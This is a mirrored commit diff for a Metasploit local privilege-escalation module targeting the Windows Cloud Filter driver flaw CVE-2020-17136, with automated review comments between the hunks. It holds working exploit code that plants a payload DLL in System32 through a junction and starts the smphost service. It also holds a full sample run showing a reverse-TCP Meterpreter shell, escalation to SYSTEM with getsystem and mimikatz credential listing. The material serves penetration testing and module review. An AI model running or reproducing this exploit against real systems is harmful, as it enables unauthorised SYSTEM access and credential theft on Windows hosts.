mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
Make second round of review edits to fix Spencer's comments
This commit is contained in:
parent d5bb36c530
commit 3072391d00
Binary file not shown.
@ -7,21 +7,23 @@ security checks that would otherwise prevent a normal user from being able to cr
they don't have permissions to create files in.

This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage
Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. The module
then uses RPCSS named pipe impersonation to obtain a `SYSTEM` token and assign it to the current process,
thereby allowing the attacker to execute arbitrary code as the `SYSTEM` user.
Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. Users are
strongly encouraged to set the `PAYLOAD` option to one of the Meterpreter payloads, as doing so will
allow them to subsequently escalate their new session from `NETWORK SERVICE` to `SYSTEM` by using
Meterpreter's `getsystem` command to perform RPCSS Named Pipe Impersonation and impersonate
the `SYSTEM` user.

### Installation And Setup
`cldflt.sys` should exist by default on all versions of Windows 10 v1803 and later.

## Verification Steps
1. Start msfconsole
2. Get a meterpreter shell as a low privileged user.
2. Get a shell as a low privileged user.
3. **Verify** that `getsystem` does not get you a `SYSTEM` shell.
4. `use exploit/windows/local/cve_2020_17136`
5. `set session *session id*`
6. `run`
7. **Verify** that you get a new shell as the `SYSTEM` user
7. **Verify** that you get a new shell as the `N` user

## Options

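Review bot: step 7 of the new Verification Steps says the new shell runs as the `N` user, which reads as a truncated `NETWORK SERVICE`; suggest `7. **Verify** that you get a new shell as the `NT AUTHORITY\NETWORK SERVICE` user` to match the `getuid` output later in the doc. Step 2 now asks for "a shell" while step 3 runs `getsystem`, a Meterpreter command, so step 2 should keep saying a Meterpreter shell (or step 3 should state that it needs one). The `### Installation And Setup` heading is also one level deeper than the sibling `## Verification Steps` and `## Options` headings.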
@ -43,7 +45,7 @@ msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 172.22.152.177:4444
[*] Sending stage (200262 bytes) to 172.22.152.177
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-06 01:26:51 -0600
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-08 11:17:11 -0600

meterpreter > getuid
Server username: DESKTOP-KUO5CML\normal
@ -60,14 +62,6 @@ SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > sysinfo
Computer : DESKTOP-KUO5CML
OS : Windows 10 (10.0 Build 19041).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 5
Meterpreter : x64/windows
meterpreter > getsystem
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
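Review bot: the header shows 8 lines dropped here, which matches the `meterpreter > sysinfo` block and its seven output lines; removing it takes out the only `OS : Windows 10 (10.0 Build 19041)` line, the build the later `check` output refers to as a vulnerable 20H1 build. Suggest keeping `sysinfo` in the sample run so a reader can tie the check result to a concrete build.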
@ -78,16 +72,20 @@ meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_17136
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/cve_2020_17136) > check
[*] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
msf6 exploit(windows/local/cve_2020_17136) > show options

Module options (exploit/windows/local/cve_2020_17136):

Name Current Setting Required Description
---- --------------- -------- -----------
AMSIBYPASS true yes Enable Amsi bypass
ETWBYPASS true yes Enable Etw bypass
SESSION yes The session to run this module on.
WAIT 5 no Time in seconds to wait
Name Current Setting Required Description
---- --------------- -------- -----------
AMSIBYPASS true yes Enable Amsi bypass
ETWBYPASS true yes Enable Etw bypass
SESSION 1 yes The session to run this module on.
WAIT 5 no Time in seconds to wait


Payload options (windows/x64/meterpreter/reverse_tcp):
@ -106,36 +104,52 @@ Exploit target:
0 Windows DLL Dropper


msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/cve_2020_17136) > set LHOST 172.22.159.28
LHOST => 172.22.159.28
msf6 exploit(windows/local/cve_2020_17136) > set LPORT 6688
LPORT => 6688
msf6 exploit(windows/local/cve_2020_17136) > run

[*] Started reverse TCP handler on 172.22.159.28:6688
[*] Started reverse TCP handler on 172.22.159.28:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
[*] Dropping payload dll at C:\Windows\Temp\WsutUtXDcIsPqEKn.dll and registering it for cleanup...
[*] Dropping payload dll at C:\Windows\Temp\BXNkequQiAvYxuVp.dll and registering it for cleanup...
[*] Running module against DESKTOP-KUO5CML
[*] Launching notepad.exe to host CLR...
[+] Process 7784 launched.
[*] Reflectively injecting the Host DLL into 7784..
[*] Injecting Host into 7784...
[*] Host injected. Copy assembly into 7784...
[+] Process 100 launched.
[*] Reflectively injecting the Host DLL into 100..
[*] Injecting Host into 100...
[*] Host injected. Copy assembly into 100...
[*] Assembly copied.
[*] Executing...
[*] Start reading output
[+] Key: 1821285265184
[+] Sync connection key: 2733760425760
[+] Done
[*] End output.
[+] Execution finished.
[*] Sending stage (200262 bytes) to 172.22.152.177
[*] Meterpreter session 2 opened (172.22.159.28:6688 -> 172.22.152.177:62867) at 2021-01-06 01:28:26 -0600
[*] Session ID 2 (172.22.159.28:6688 -> 172.22.152.177:62867) processing AutoRunScript 'post/windows/escalate/getsystem'
[+] Obtained SYSTEM via technique 4
[*] Meterpreter session 2 opened (172.22.159.28:4444 -> 172.22.152.177:49968) at 2021-01-08 11:18:19 -0600

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs
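Review bot: the new run opens session 2 as `NT AUTHORITY\NETWORK SERVICE` and then elevates with a manual `getsystem`, which is consistent with dropping the `post/windows/escalate/getsystem` AUTORUNSCRIPT default in the module. The `getprivs` output captured before `getsystem` shows `SeImpersonatePrivilege`, which the RPCSS named pipe impersonation technique depends on; one sentence in the docs pointing that out would explain why `getsystem` fails for the low-privileged user earlier in the run and succeeds here.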
@ -157,7 +171,7 @@ SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > load kiwi
Loading extension kiwi...cre
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
@ -198,8 +212,8 @@ normal DESKTOP-KUO5CML (null)
test DESKTOP-KUO5CML (null)


meterpreter > background
[*] Backgrounding session 2...
meterpreter >
Background session 2? [y/N]
msf6 exploit(windows/local/cve_2020_17136) > sessions

Active sessions
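Review bot: the new transcript replaces the explicit `background` command with an empty `meterpreter >` prompt and the `Background session 2? [y/N]` question, but neither the `y` answer nor the `[*] Backgrounding session 2...` confirmation appears before the `sessions` command; suggest showing either `meterpreter > background` or the prompt together with its answer so the step is reproducible.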
@ -208,7 +222,7 @@ Active sessions
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-KUO5CML\normal @ DESKTOP-KUO5CML 0.0.0.0:0 -> 172.22.152.177:4444 (172.22.152.177)
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML 172.22.159.28:6688 -> 172.22.152.177:62867 (172.22.152.177)
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML 172.22.159.28:4444 -> 172.22.152.177:49968 (172.22.152.177)

msf6 exploit(windows/local/cve_2020_17136) >
```
@ -590,7 +590,7 @@ namespace POC_CloudFilter_ArbitraryFile_EoP
CfConnectSyncRoot(SyncRoot, table, IntPtr.Zero, CF_CONNECT_FLAGS.CF_CONNECT_FLAG_NONE, out long key).Check();
try
{
Console.WriteLine("Key: {0}", key);
Console.WriteLine("Sync connection key: {0}", key);
CF_PLACEHOLDER_CREATE_INFO[] place_holders = new CF_PLACEHOLDER_CREATE_INFO[1];
place_holders[0].RelativeFileName = FilePath;
CF_FS_METADATA meta_data = new CF_FS_METADATA
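Review bot: the message printed after `CfConnectSyncRoot` succeeds becomes `Sync connection key: {0}`, and the docs' sample run now shows `[+] Sync connection key:` in the assembly output; since the module executes the prebuilt `data/exploits/CVE-2020-17136/cloudFilterEOP.exe`, confirm that binary was rebuilt from this source revision so the shipped output matches the docs.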
@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Local
include Msf::Post::Windows::ReflectiveDLLInjection
include Msf::Post::Windows::Dotnet
include Msf::Post::Windows::Services
include Msf::Post::Windows::FileSystem
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck

@ -20,17 +21,20 @@ class MetasploitModule < Msf::Exploit::Local
info,
'Name' => 'CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP',
'Description' => %q{
The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December 2020 updates,
did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when calling
FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() function with attacker
controlled input. This meant that files were created with KernelMode permissions, thereby bypassing any
security checks that would otherwise prevent a normal user from being able to create files in directories
The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December
2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when
calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders()
function with attacker controlled input. This meant that files were created with
KernelMode permissions, thereby bypassing any security checks that would otherwise
prevent a normal user from being able to create files in directories
they don't have permissions to create files in.

This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage
Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. The module
then uses RPCSS named pipe impersonation to obtain a SYSTEM token and assign it to the current process,
thereby allowing the attacker to execute arbitrary code as the SYSTEM user.
This module abuses this vulnerability to perform a DLL hijacking attack against the
Microsoft Storage Spaces SMP service, which grants the attacker code execution as the
NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one
of the Meterpreter payloads, as doing so will allow them to subsequently escalate their
new session from NETWORK SERVICE to SYSTEM by using Meterpreter's "getsystem" command
to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.
},
'License' => MSF_LICENSE,
'Author' => [
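Review bot: the `'Name'` context line reads `CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP`, while the module path, the exe path and the docs all use `cve_2020_17136`/`CVE-2020-17136`; this looks like a dropped digit and should be `CVE-2020-17136`. The reflowed description otherwise matches the markdown docs in the same commit.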
@ -40,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Local
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Privileged' => true,
'Arch' => [ARCH_X86, ARCH_X64],
'Arch' => [ARCH_X64],
'Targets' =>
[
[ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ],
@ -62,7 +66,6 @@ class MetasploitModule < Msf::Exploit::Local
{
'EXITFUNC' => 'process',
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
'AUTORUNSCRIPT' => 'post/windows/escalate/getsystem'
}
)
)
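Review bot: with `'AUTORUNSCRIPT'` removed, `'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',` becomes the last entry in `DefaultOptions` and keeps its trailing comma; Ruby accepts it, but check it against the framework's rubocop settings. The removal itself matches the new docs, which ask users to run `getsystem` themselves after the session opens.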
@ -81,23 +84,6 @@ class MetasploitModule < Msf::Exploit::Local
)
end

def find_required_clr(exe_path)
filecontent = File.read(exe_path).bytes
sign = 'v4.0.30319'.bytes
filecontent.each_with_index do |_item, index|
sign.each_with_index do |subitem, indexsub|
break if subitem.to_s(16) != filecontent[index + indexsub].to_s(16)

if indexsub == 9
vprint_status('CLR version required: v4.0.30319')
return 'v4.0.30319'
end
end
end
vprint_status('CLR version required: v2.0.50727')
'v2.0.50727'
end

def check_requirements(clr_req, installed_dotnet_versions)
installed_dotnet_versions.each do |fi|
if clr_req == 'v4.0.30319'
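Review bot: dropping `find_required_clr` in favour of a fixed `'v4.0.30319'` is reasonable because the assembly is a bundled prebuilt binary rather than user-supplied input; a one-line comment at the `check_requirements` call noting that `cloudFilterEOP.exe` targets the .NET 4 CLR would keep that constant from reading as a magic string. The removed scanner also had no bounds check on `filecontent[index + indexsub]`, so a match attempt near the end of the file would have hit `nil.to_s(16)` and raised; nothing is lost by removing it.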
@ -116,7 +102,6 @@ class MetasploitModule < Msf::Exploit::Local

def check
sysinfo_value = sysinfo['OS']

if sysinfo_value !~ /windows/i
# Non-Windows systems are definitely not affected.
return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
@ -153,23 +138,29 @@ class MetasploitModule < Msf::Exploit::Local
def exploit
if sysinfo['Architecture'] != 'x64'
fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!')
elsif session.arch != 'x64'
fail_with(Failure::NoTarget, 'Sorry, WoW64 is not supported at this time!')
end
dir_junct_path = 'C:\\Windows\\Temp'
intermediate_dir = rand_text_alpha(10).to_s
junction_dir = rand_text_alpha(10).to_s
path_to_intermediate_dir = "#{dir_junct_path}\\#{intermediate_dir}"

cd(dir_junct_path)
mkdir(intermediate_dir)
if !directory?("#{dir_junct_path}\\#{intermediate_dir}")
mkdir("#{path_to_intermediate_dir}")
if !directory?("#{path_to_intermediate_dir}")
fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!')
end
register_dir_for_cleanup("#{dir_junct_path}\\#{intermediate_dir}")
register_dir_for_cleanup("#{path_to_intermediate_dir}")

cmd_exec("cmd.exe /C \"mklink /J #{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir} C:\\\"")
if !directory?("#{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir}")
fail_with(Failure::UnexpectedReply, 'Could not create the junction directory!')
mkdir("#{path_to_intermediate_dir}\\#{junction_dir}")
if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")
fail_with(Failure::UnexpectedReply, 'Could not create the junction directory as a folder!')
end

mount_handle = create_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", 'C:\\')
if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")
fail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!')
end
register_dir_for_cleanup("#{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir}")

exe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe'
unless File.file?(exe_path)
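Review bot: the `directory?` check after `create_mount_point` cannot tell whether the reparse point was actually created, because the directory already exists from the `mkdir` a few lines earlier and `directory?` is true either way; the `Could not transform the junction directory into a junction!` failure should instead test the value returned in `mount_handle` (the same handle `delete_mount_point` needs later). Separately, now that `mkdir` takes the full `path_to_intermediate_dir`, the preceding `cd(dir_junct_path)` no longer contributes to this flow and can go. Swapping the `cmd.exe /C mklink /J` call for `create_mount_point` is a good change on its own: it avoids spawning a shell with an interpolated path.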
@ -180,17 +171,18 @@ class MetasploitModule < Msf::Exploit::Local
if installed_dotnet_versions == []
fail_with(Failure::BadConfig, 'Target has no .NET framework installed')
end
rclr = find_required_clr(exe_path)
if check_requirements(rclr, installed_dotnet_versions) == false
if check_requirements('v4.0.30319', installed_dotnet_versions) == false
fail_with(Failure::BadConfig, 'CLR required for assembly not installed')
end
payload_path = "C:\\Windows\\Temp\\#{rand_text_alpha(16)}.dll"
print_status("Dropping payload dll at #{payload_path} and registering it for cleanup...")
write_file(payload_path, generate_payload_dll)
register_file_for_cleanup(payload_path)
execute_assembly(exe_path, "#{dir_junct_path}\\#{intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}")
execute_assembly(exe_path, "#{path_to_intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}")
service_start('smphost')
register_file_for_cleanup('C:\\Windows\\System32\\healthapi.dll')
sleep(3)
delete_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", mount_handle)
end

def pid_exists(pid)
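Review bot: `delete_mount_point` only runs if `execute_assembly` and `service_start('smphost')` return normally; a raise or a `fail_with` inside either leaves the mount point under `C:\Windows\Temp` in place, so the `create_mount_point`/`delete_mount_point` pair should be wrapped in `begin`/`ensure` so the reparse point is removed on every exit path. It would also help to say in the docs that `healthapi.dll` in `System32` is registered for cleanup but may only be deletable once `smphost` has released it.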